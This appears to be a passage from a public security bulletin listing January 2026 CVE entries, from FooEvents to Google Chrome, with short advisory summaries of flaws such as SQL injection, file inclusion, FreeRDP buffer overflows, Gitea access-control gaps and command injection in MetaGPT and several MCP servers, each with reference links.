| FooEvents--FooEvents for WooCommerce | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in FooEvents FooEvents for WooCommerce fooevents allows SQL Injection. This issue affects FooEvents for WooCommerce: from n/a through <= 1.20.4. | 2026-01-22 | not yet calculated | CVE-2025-69045 | https://patchstack.com/database/Wordpress/Plugin/fooevents/vulnerability/wordpress-fooevents-for-woocommerce-plugin-1-20-4-sql-injection-vulnerability?_s_id=cve |
| foreverpinetree--TheNa | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in foreverpinetree TheNa thena allows Reflected XSS. This issue affects TheNa: from n/a through <= 1.5.5. | 2026-01-22 | not yet calculated | CVE-2025-67614 | https://patchstack.com/database/Wordpress/Theme/thena/vulnerability/wordpress-thena-theme-1-5-5-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| Foundation Agents--MetaGPT | Foundation Agents MetaGPT deserialize_message Deserialization of Untrusted Data Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foundation Agents MetaGPT. Authentication is not required to exploit this vulnerability. The specific flaw exists within the deserialize_message function. The issue results from the lack of proper validation of user-supplied data, which can result in deserialization of untrusted data. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28121. | 2026-01-23 | not yet calculated | CVE-2026-0760 | ZDI-26-026 |
| Foundation Agents--MetaGPT | Foundation Agents MetaGPT actionoutput_str_to_mapping Code Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foundation Agents MetaGPT. Authentication is not required to exploit this vulnerability. The specific flaw exists within the actionoutput_str_to_mapping function. The issue results from the lack of proper validation of a user-supplied string before using it to execute Python code. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-28124. | 2026-01-23 | not yet calculated | CVE-2026-0761 | ZDI-26-027 |
| Framelink--Figma MCP Server | Framelink Figma MCP Server fetchWithRetry Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Framelink Figma MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the fetchWithRetry method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27877. | 2026-01-23 | not yet calculated | CVE-2025-15061 | ZDI-25-1197 vendor-provided URL |
| Frank Corso--Quote Master | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Frank Corso Quote Master quote-master allows Reflected XSS. This issue affects Quote Master: from n/a through <= 7.1.1. | 2026-01-22 | not yet calculated | CVE-2025-68849 | https://patchstack.com/database/Wordpress/Plugin/quote-master/vulnerability/wordpress-quote-master-plugin-7-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| franklioxygen--MyTube | MyTube is a self-hosted downloader and player for several video websites. Versions 1.7.78 and below do not safeguard against authorization bypass, allowing guest users to download the complete application database. The application fails to properly validate user permissions on the database export endpoint, enabling low-privileged users to access sensitive data they should not have permission to view. | 2026-01-23 | not yet calculated | CVE-2026-24139 | https://github.com/franklioxygen/MyTube/security/advisories/GHSA-hhc3-8q8c-89q7 https://github.com/franklioxygen/MyTube/commit/e271775e27d51b26e54731b7b874447f47a1f280 |
| Free5GC--Free5GC | An issue was discovered in Free5gc NRF 1.4.0. In the access-token generation logic of free5GC, the AccessTokenScopeCheck() function in file internal/sbi/processor/access_token.go bypasses all scope validation when the attacker uses a crafted targetNF value. This allows attackers to obtain an access token with any arbitrary scope. | 2026-01-23 | not yet calculated | CVE-2025-66719 | https://github.com/free5gc/free5gc/issues/736 https://github.com/free5gc/nrf/pull/73 |
| Free5GC--Free5GC | Null pointer dereference in free5gc pcf 1.4.0 in file internal/sbi/processor/ampolicy.go in function HandleDeletePoliciesPolAssoId. | 2026-01-23 | not yet calculated | CVE-2025-66720 | https://github.com/free5gc/free5gc/issues/726 https://github.com/free5gc/pcf/pull/57 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0,`freerdp_bitmap_decompress_planar` does not validate `nSrcWidth`/`nSrcHeight` against `planar->maxWidth`/`maxHeight` before RLE decode. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23530 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-r4hv-852m-fq7p https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/planar.c#L1689-L1696 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/planar.c#L1713-L1716 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/planar.c#L951-L953 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, in ClearCodec, when `glyphData` is present, `clear_decompress` calls `freerdp_image_copy_no_overlap` without validating the destination rectangle, allowing an out-of-bounds read/write via crafted RDPGFX surface updates. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23531 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-xj5h-9cr5-23c5 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L1139-L1145 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, a client-side heap buffer overflow occurs in the FreeRDP client's `gdi_SurfaceToSurface` path due to a mismatch between destination rectangle clamping and the actual copy size. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23532 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-fq8c-87hj-7gvr https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/gdi/gfx.c#L1368-L1382 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, a client-side heap buffer overflow occurs in the RDPGFX ClearCodec decode path when maliciously crafted residual data causes out-of-bounds writes during color output. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23533 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-32q9-m5qr-9j2v https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L268-L281 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L336 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, a client-side heap buffer overflow occurs in the ClearCodec bands decode path when crafted band coordinates allow writes past the end of the destination surface buffer. A malicious server can trigger a client‑side heap buffer overflow, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23534 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-3frr-mp8w-4599 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L878-L879 https://github.com/FreeRDP/FreeRDP/blob/38514dfa5813aa945a86cfbcec279033f8394468/libfreerdp/codec/clear.c#L883-L884 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, FastGlyph parsing trusts `cbData`/remaining length and never validates against the minimum size implied by `cx/cy`. A malicious server can trigger a client‑side global buffer overflow, causing a crash (DoS). Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23732 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-7qxp-j2fj-c3pp https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/cache/glyph.c#L463-L480 https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/codec/color.c#L261-L277 https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/core/graphics.c#L138 https://github.com/FreeRDP/FreeRDP/blob/f96ee2a6dd02739325c2a4e36a14978b561f00ea/libfreerdp/core/orders.c#L2186C17-L2199 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, `xf_Pointer_New` frees `cursorPixels` on failure, then `pointer_free` calls `xf_Pointer_Free` and frees it again, triggering ASan UAF. A malicious server can trigger a client‑side use after free, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23883 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-qcrr-85qx-4p6x https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/client/X11/xf_graphics.c#L312-L319 https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/client/X11/xf_graphics.c#L340 https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/libfreerdp/cache/pointer.c#L164-L174 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to version 3.21.0, offscreen bitmap deletion leaves `gdi->drawing` pointing to freed memory, causing UAF when related update packets arrive. A malicious server can trigger a client‑side use after free, causing a crash (DoS) and potential heap corruption with code‑execution risk depending on allocator behavior and surrounding heap layout. Version 3.21.0 contains a patch for the issue. | 2026-01-19 | not yet calculated | CVE-2026-23884 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-cfgj-vc84-f3pp https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/libfreerdp/cache/offscreen.c#L114-L122 https://github.com/FreeRDP/FreeRDP/blob/3370e30e92a021eb680892dda14d642bc8b8727c/libfreerdp/cache/offscreen.c#L87-L91 https://github.com/FreeRDP/FreeRDP/releases/tag/3.21.0 |
| Fsas Technologies Inc.--ServerView Agents for Windows | The installer of ServerView Agents for Windows provided by Fsas Technologies Inc. may insecurely load Dynamic Link Libraries. Arbitrary code may be executed with the administrator privilege when the installer is executed. | 2026-01-21 | not yet calculated | CVE-2026-24016 | https://www.fsastech.com/ja-jp/resources/security/2026/0121.html https://jvn.jp/en/jp/JVN65211823/ |
| fuelthemes--North | Deserialization of Untrusted Data vulnerability in fuelthemes North north-wp allows Object Injection. This issue affects North: from n/a through <= 5.7.5. | 2026-01-22 | not yet calculated | CVE-2025-69099 | https://patchstack.com/database/Wordpress/Theme/north-wp/vulnerability/wordpress-north-theme-5-7-5-php-object-injection-vulnerability?_s_id=cve |
| fuelthemes--North | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes North north-wp allows PHP Local File Inclusion. This issue affects North: from n/a through <= 5.7.5. | 2026-01-22 | not yet calculated | CVE-2025-69100 | https://patchstack.com/database/Wordpress/Theme/north-wp/vulnerability/wordpress-north-theme-5-7-5-local-file-inclusion-vulnerability?_s_id=cve |
| fuelthemes--Werkstatt | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes Werkstatt werkstatt allows PHP Local File Inclusion. This issue affects Werkstatt: from n/a through < 4.8.3. | 2026-01-22 | not yet calculated | CVE-2025-69314 | https://patchstack.com/database/Wordpress/Theme/werkstatt/vulnerability/wordpress-werkstatt-theme-4-8-3-local-file-inclusion-vulnerability?_s_id=cve |
| fuelthemes--WerkStatt Plugin | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in fuelthemes WerkStatt Plugin werkstatt-plugin allows PHP Local File Inclusion. This issue affects WerkStatt Plugin: from n/a through <= 1.6.6. | 2026-01-22 | not yet calculated | CVE-2025-63017 | https://patchstack.com/database/Wordpress/Plugin/werkstatt-plugin/vulnerability/wordpress-werkstatt-plugin-plugin-1-6-6-local-file-inclusion-vulnerability?_s_id=cve |
| garidium--g-FFL Checkout | Unrestricted Upload of File with Dangerous Type vulnerability in garidium g-FFL Checkout g-ffl-checkout allows Upload a Web Shell to a Web Server. This issue affects g-FFL Checkout: from n/a through <= 2.1.0. | 2026-01-22 | not yet calculated | CVE-2025-68001 | https://patchstack.com/database/Wordpress/Plugin/g-ffl-checkout/vulnerability/wordpress-g-ffl-checkout-plugin-2-1-0-arbitrary-file-upload-vulnerability?_s_id=cve |
| Gemini MCP Tool--gemini-mcp-tool | gemini-mcp-tool execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of gemini-mcp-tool. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27783. | 2026-01-23 | not yet calculated | CVE-2026-0755 | ZDI-26-021 |
| gemsloyalty--gemsloyalty | A vulnerability in the PHP backend of gemsloyalty.aptsys.com.sg thru 2025-05-28 allows unauthenticated remote attackers to trigger detailed error messages that disclose internal file paths, code snippets, and stack traces. This occurs when specially crafted HTTP GET/POST requests are sent to public API endpoints, exposing potentially sensitive information useful for further exploitation. This issue is classified under CWE-209: Information Exposure Through an Error Message. | 2026-01-23 | not yet calculated | CVE-2025-52022 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| gemsloyalty--gemsloyalty | A vulnerability in the PHP backend of gemscms.aptsys.com.sg thru 2025-05-28 allows unauthenticated remote attackers to trigger detailed error messages that disclose internal file paths, code snippets, and stack traces. This occurs when specially crafted HTTP GET/POST requests are sent to public API endpoints, exposing potentially sensitive information useful for further exploitation. This issue is classified under CWE-209: Information Exposure Through an Error Message. | 2026-01-23 | not yet calculated | CVE-2025-52023 | http://aptsys.com http://gemscms.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| gemsloyalty--gemsloyalty | A vulnerability exists in the Aptsys POS Platform Web Services module thru 2025-05-28, which exposes internal API testing tools to unauthenticated users. By accessing specific URLs, an attacker is presented with a directory-style index listing all available backend services and POS web services, each with an HTML form for submitting test input. These panels are intended for developer use, but are accessible in production environments with no authentication or session validation. This grants any external actor the ability to discover, test, and execute API endpoints that perform critical functions including but not limited to user transaction retrieval, credit adjustments, POS actions, and internal data queries. | 2026-01-23 | not yet calculated | CVE-2025-52024 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| gemsloyalty--gemsloyalty | An SQL Injection vulnerability exists in the GetServiceByRestaurantID endpoint of the Aptsys gemscms POS Platform backend thru 2025-05-28. The vulnerability arises because user input is directly inserted into a dynamic SQL query syntax without proper sanitization or parameterization. This allows an attacker to inject and execute arbitrary SQL code by submitting crafted input in the id parameter, leading to unauthorized data access or modification. | 2026-01-23 | not yet calculated | CVE-2025-52025 | http://aptsys.com https://gist.github.com/ReverseThatApp/4a6be2b9b2ba39d38c35c8753e0afd39 |
| Genetech Products--Pie Register | Missing Authorization vulnerability in Genetech Products Pie Register pie-register allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Pie Register: from n/a through <= 3.8.4.7. | 2026-01-23 | not yet calculated | CVE-2026-24577 | https://patchstack.com/database/Wordpress/Plugin/pie-register/vulnerability/wordpress-pie-register-plugin-3-8-4-7-broken-access-control-vulnerability?_s_id=cve |
| Get-Simple--My SMTP Contact Plugin | GetSimple CMS My SMTP Contact Plugin 1.1.2 contains a PHP code injection vulnerability. An authenticated administrator can inject arbitrary PHP code through plugin configuration parameters, leading to remote code execution on the server. | 2026-01-21 | not yet calculated | CVE-2021-47778 | ExploitDB-49774 Vendor Homepage GetSimple CMS GitHub Repository Full Disclosure Repository VulnCheck Advisory: GetSimple CMS My SMTP Contact Plugin 1.1.2 - PHP Code Injection |
| getarcaneapp--arcane | Arcane is an interface for managing Docker containers, images, networks, and volumes. Prior to version 1.13.2, unauthenticated requests could be proxied to remote environment agents, allowing access to remote environment resources without authentication. The environment proxy middleware handled `/api/environments/{id}/...` requests for remote environments before authentication was enforced. When the environment ID was not local, the middleware proxied the request and attached the manager-held agent token, even if the caller was unauthenticated. This enabled unauthenticated access to remote environment operations (e.g., listing containers, streaming logs, or other agent endpoints). An unauthenticated attacker could access and manipulate remote environment resources via the proxy, potentially leading to data exposure, unauthorized changes, or service disruption. Version 1.13.2 patches the vulnerability. | 2026-01-19 | not yet calculated | CVE-2026-23944 | https://github.com/getarcaneapp/arcane/security/advisories/GHSA-2jv8-39rp-cqqr https://github.com/getarcaneapp/arcane/pull/1532 https://github.com/getarcaneapp/arcane/commit/2008e1b93b25d0c4c3fff3af07843766231614eb https://github.com/getarcaneapp/arcane/releases/tag/v1.13.2 |
| GetSimple CMS--My SMTP Contact Plugin | GetSimple CMS My SMTP Contact Plugin 1.1.1 contains a cross-site request forgery (CSRF) vulnerability. Attackers can craft a malicious webpage that, when visited by an authenticated administrator, can change SMTP configuration settings in the plugin. This may allow unauthorized changes but does not directly enable remote code execution. | 2026-01-21 | not yet calculated | CVE-2021-47830 | ExploitDB-49774 ExploitDB-49798 GetSimple CMS Webpage GetSimple CMS GitHub Repository VulnCheck Advisory: GetSimple CMS My SMTP Contact Plugin 1.1.1 - CSRF |
| GetSimple CMS--My SMTP Contact Plugin | GetSimple CMS My SMTP Contact Plugin 1.1.2 suffers from a Stored Cross-Site Scripting (XSS) vulnerability. The plugin attempts to sanitize user input using htmlspecialchars(), but this can be bypassed by passing dangerous characters as escaped hex bytes. This allows attackers to inject arbitrary client-side code that executes in the administrator's browser when visiting a malicious page. | 2026-01-21 | not yet calculated | CVE-2021-47870 | Full Disclosure Repository Vendor Homepage GetSimple CMS GitHub Repository ExploitDB-49798 VulnCheck Advisory: GetSimple CMS My SMTP Contact Plugin 1.1.2 - Stored XSS |
| GIMP--GIMP | GIMP PSP File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of GIMP. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-28232. | 2026-01-23 | not yet calculated | CVE-2025-15059 | ZDI-25-1196 vendor-provided URL |
| Gitea--Gitea Open Source Git Server | Gitea may send release notification emails for private repositories to users whose access has been revoked. When a repository is changed from public to private, users who previously watched the repository may continue to receive release notifications, potentially disclosing release titles, tags, and content. | 2026-01-22 | not yet calculated | CVE-2026-0798 | GitHub Security Advisory GitHub Pull Request #36319 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly verify repository context when deleting attachments. A user who previously uploaded an attachment to a repository may be able to delete it after losing access to that repository by making the request through a different repository they can access. | 2026-01-22 | not yet calculated | CVE-2026-20736 | GitHub Security Advisory GitHub Pull Request #36320 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate project ownership in organization project operations. A user with project write access in one organization may be able to modify projects belonging to a different organization. | 2026-01-22 | not yet calculated | CVE-2026-20750 | GitHub Security Advisory GitHub Pull Request #36318 GitHub Pull Request #36373 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea's notification API does not re-validate repository access permissions when returning notification details. After a user's access to a private repository is revoked, they may still view issue and pull request titles through previously received notifications. | 2026-01-22 | not yet calculated | CVE-2026-20800 | GitHub Security Advisory GitHub Pull Request #36339 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea's stopwatch API does not re-validate repository access permissions. After a user's access to a private repository is revoked, they may still view issue titles and repository names through previously started stopwatches. | 2026-01-22 | not yet calculated | CVE-2026-20883 | GitHub Security Advisory GitHub Pull Request #36340 GitHub Pull Request #36368 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly verify authorization when canceling scheduled auto-merges via the web interface. A user with read access to pull requests may be able to cancel auto-merges scheduled by other users. | 2026-01-22 | not yet calculated | CVE-2026-20888 | GitHub Security Advisory GitHub Pull Request #36341 GitHub Pull Request #36356 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate repository ownership when deleting Git LFS locks. A user with write access to one repository may be able to delete LFS locks belonging to other repositories. | 2026-01-22 | not yet calculated | CVE-2026-20897 | GitHub Security Advisory GitHub Pull Request #36344 GitHub Pull Request #36349 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate ownership when toggling OpenID URI visibility. An authenticated user may be able to change the visibility settings of other users' OpenID identities. | 2026-01-22 | not yet calculated | CVE-2026-20904 | GitHub Security Advisory GitHub Pull Request #36346 GitHub Pull Request #36361 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| Gitea--Gitea Open Source Git Server | Gitea does not properly validate repository ownership when linking attachments to releases. An attachment uploaded to a private repository could potentially be linked to a release in a different public repository, making it accessible to unauthorized users. | 2026-01-22 | not yet calculated | CVE-2026-20912 | GitHub Security Advisory GitHub Pull Request #36320 GitHub Pull Request #36355 Gitea v1.25.4 Release Gitea v1.25.4 Release Blog Post |
| github-kanban-mcp-server--github-kanban-mcp-server | github-kanban-mcp-server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of github-kanban-mcp-server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the create_issue parameter. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27784. | 2026-01-23 | not yet calculated | CVE-2026-0756 | ZDI-26-022 |
| GLS--GLS Shipping for WooCommerce | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GLS GLS Shipping for WooCommerce gls-shipping-for-woocommerce allows Reflected XSS. This issue affects GLS Shipping for WooCommerce: from n/a through <= 1.4.0. | 2026-01-22 | not yet calculated | CVE-2025-68011 | https://patchstack.com/database/Wordpress/Plugin/gls-shipping-for-woocommerce/vulnerability/wordpress-gls-shipping-for-woocommerce-plugin-1-3-3-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve |
| goalthemes--Bailly | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Bailly bailly allows PHP Local File Inclusion. This issue affects Bailly: from n/a through <= 1.3.4. | 2026-01-22 | not yet calculated | CVE-2025-69039 | https://patchstack.com/database/Wordpress/Theme/bailly/vulnerability/wordpress-bailly-theme-1-3-4-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Bfres | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Bfres bfres allows PHP Local File Inclusion. This issue affects Bfres: from n/a through <= 1.2.1. | 2026-01-22 | not yet calculated | CVE-2025-69040 | https://patchstack.com/database/Wordpress/Theme/bfres/vulnerability/wordpress-bfres-theme-1-2-1-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Dekoro | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Dekoro dekoro allows PHP Local File Inclusion. This issue affects Dekoro: from n/a through <= 1.0.7. | 2026-01-22 | not yet calculated | CVE-2025-69041 | https://patchstack.com/database/Wordpress/Theme/dekoro/vulnerability/wordpress-dekoro-theme-1-0-7-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Hyori | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Hyori hyori allows PHP Local File Inclusion. This issue affects Hyori: from n/a through <= 1.3.6. | 2026-01-22 | not yet calculated | CVE-2025-69038 | https://patchstack.com/database/Wordpress/Theme/hyori/vulnerability/wordpress-hyori-theme-1-3-6-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Lindo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Lindo lindo allows PHP Local File Inclusion. This issue affects Lindo: from n/a through <= 1.2.5. | 2026-01-22 | not yet calculated | CVE-2025-69042 | https://patchstack.com/database/Wordpress/Theme/lindo/vulnerability/wordpress-lindo-theme-1-2-5-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Pippo | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Pippo pippo allows PHP Local File Inclusion. This issue affects Pippo: from n/a through <= 1.2.3. | 2026-01-22 | not yet calculated | CVE-2025-69037 | https://patchstack.com/database/Wordpress/Theme/pippo/vulnerability/wordpress-pippo-theme-1-2-3-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Rashy | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Rashy rashy allows PHP Local File Inclusion. This issue affects Rashy: from n/a through <= 1.1.3. | 2026-01-22 | not yet calculated | CVE-2025-69043 | https://patchstack.com/database/Wordpress/Theme/rashy/vulnerability/wordpress-rashy-theme-1-1-3-local-file-inclusion-vulnerability?_s_id=cve |
| goalthemes--Vango | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in goalthemes Vango vango allows PHP Local File Inclusion. This issue affects Vango: from n/a through <= 1.3.3. | 2026-01-22 | not yet calculated | CVE-2025-69044 | https://patchstack.com/database/Wordpress/Theme/vango/vulnerability/wordpress-vango-theme-1-3-3-local-file-inclusion-vulnerability?_s_id=cve |
| Google--Chrome | Out of bounds memory access in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2026-01-20 | not yet calculated | CVE-2026-0899 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/458914193 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High) | 2026-01-20 | not yet calculated | CVE-2026-0900 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/465730465 |
| Google--Chrome | Inappropriate implementation in Blink in Google Chrome on Android prior to 144.0.7559.59 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-01-20 | not yet calculated | CVE-2026-0901 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/40057499 |
| Google--Chrome | Inappropriate implementation in V8 in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0902 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/469143679 |
| Google--Chrome | Inappropriate implementation in Downloads in Google Chrome on Windows prior to 144.0.7559.59 allowed a remote attacker to bypass dangerous file type protections via a malicious file. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0903 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/444803530 |
| Google--Chrome | Incorrect security UI in Digital Credentials in Google Chrome prior to 144.0.7559.59 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0904 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/452209495 |
| Google--Chrome | Insufficient policy enforcement in Network in Google Chrome prior to 144.0.7559.59 allowed an attack who obtained a network log file to potentially obtain potentially sensitive information via a network log file. (Chromium security severity: Medium) | 2026-01-20 | not yet calculated | CVE-2026-0905 | https://chromereleases.googleblog.com/2026/01/stable-channel-update-for-desktop_13.html https://issues.chromium.org/issues/465466773 |
